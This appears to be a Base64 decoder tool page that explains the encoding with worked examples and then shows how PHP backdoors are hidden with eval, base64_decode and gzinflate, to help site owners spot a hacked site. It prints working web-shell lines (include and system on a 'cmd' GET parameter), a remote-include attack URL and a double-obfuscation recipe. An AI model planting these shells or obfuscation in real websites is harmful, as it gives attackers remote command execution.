Decode Base64 online

EnglishNederlands
Base64 decode | Decimal to binary | Hexadecimal converter | Hash generator | Colored QR Code
Cisco password cracker | Base64 to image | MAC address database| Decrypt MD5 online
Decode gzinflate base64 | IP Address | TCP-UDP Port check

Base64 Decoder - Encoder.

This base64 online decoder tool allows you to encode the text to ASCII characters and decode Base64 online. Base64 decode / encode most commonly used in e-mail protocols to transfer binary data such as files and pictures. Also spammers and hackers make use of base64 decode option to hide the content of their scripts or messages from simple antispam or antivirus programs, filters or from people eyes.

To encode or decode base64 online, just paste your string in the textarea.

If you need to decode eval(gzinflate(base64_decode, please scroll down this page and use gzinflate decoder.


Base64 decode | encode


How base64 encoding works?

Example A.

× Let's begin with a string "Base64"

Base64


× Hexadecimal representation:

426173653634


× Binary representation: Binary converter

010000100110000101110011011001010011011000110100


× Now we need to split the result in groups of 6 bits.

010000100110000101110011011001010011011000110100


× Next, convert the groups of 6 bits into decimal representation.

163855125192452


× Now we can use the base64 encoding table to convert the decimal values
into base64 equivalent.

QmFzZTY0


Example B.

× We will split the string "Base64" into two smaller strings: "Ba" and "se64" encode it into Base64.
So, we have:

Ba


× Hexadecimal representation:

4261


× Binary representation:

0100001001100001


× We can split it in two groups of 6 bits. But the last group is only 4 bits long,
so we need to add two extra bits of '0' and remember it by putting a '=' at the end.

010000100110000100


× In decimal:

16384


× Base64 encoded equivalent:

QmE=


Example C.

se64


× Hexadecimal representation:

73653634


× Binary representation:

01110011011001010011011000110100


× Splitted in groups of 6 bits. The last group contains only two bits.
Because of this we need to add four extra bits of '0' and put two '=' at the end.

011100110110010100110110001101000000


× Base64 encoded string will be:

c2U2NA==


Base64 encoding table.

Base64 encoding table



Eval base64_decode.

Eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs=")); What it means? If you found something like this in the code of your website, most probably your site is hacked. This is a kind of backdoor in your site. Decoded from Base64 it will be

if(isset($_GET["cmd"]))include $_GET["cmd"];

An attacker can execute own scripts in the content of your website. He can do it like this

http://www.yoursite.com/index.php?cmd=http://www.somesite.com/somescript.txt

Somescript.txt can cotain a code like this system("dir"); where "dir" is a command that will be executed.

Fortunately attacker do not think about the fact that he uses method GET, so you can see in the webserver logs what he did exactly.

If you found it in your site first of all change your passwords, check file rights (that should be 644), newer use the same passwords for database and FTP, bacause the database password most commonly stored in plain-text. Do not use shared hosting, bacause if one website located on shared hosting is hacked, it is simple to hack any other website located at same server.

Decode eval gzinflate base64_decode.

Base64 decoder above will show something like this

+®,.IÍÕP‰ww ‰VOÎMQÕ´�

when you try to decode this php web shell
<?php
eval(gzinflate(base64_decode('K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=')));
?>

It's so, because this code was first compressed using gzdeflate and compressed data was encoded into base64. The script above will decode, decompress an execute obfuscated part of code.

Example below illustrate that kind of code obfuscation:

$ob='system($_GET[\'cmd\']);';
// Original // system($_GET['cmd']);
$gzcompressed = base64_encode(gzdeflate($ob));
// Obfuscated // K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=
$gzcompressed1 = base64_encode(gzdeflate($gzcompressed));
// Obfuscated two times // 8zYzKfbJzvMzDHP2SjFO9ssMiwqoyjYMyrIMN3BKd7QFAA==
$decompressed1 = gzinflate(base64_decode($gzcompressed1));
// Deobfuscated one time // K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=
$decompressed = gzinflate(base64_decode($decompressed1));
// Deobfuscated two times // system($_GET[\'cmd\']);

To decode gzinflate base64_decode construction automatically, paste your code below included php tags.

Decode Base64 gzinflate.

Valid HTML 4.01 Transitional

Online decode encode tools:

Base64 decode | Decimal to binary | Hexadecimal converter | Hash generator | QR Code
Cisco password cracker | Base64 to image | MAC address database | Decrypt MD5 online
Decode gzinflate base64 | IP Address | TCP-UDP Port check
© 2011-2012 Base64 online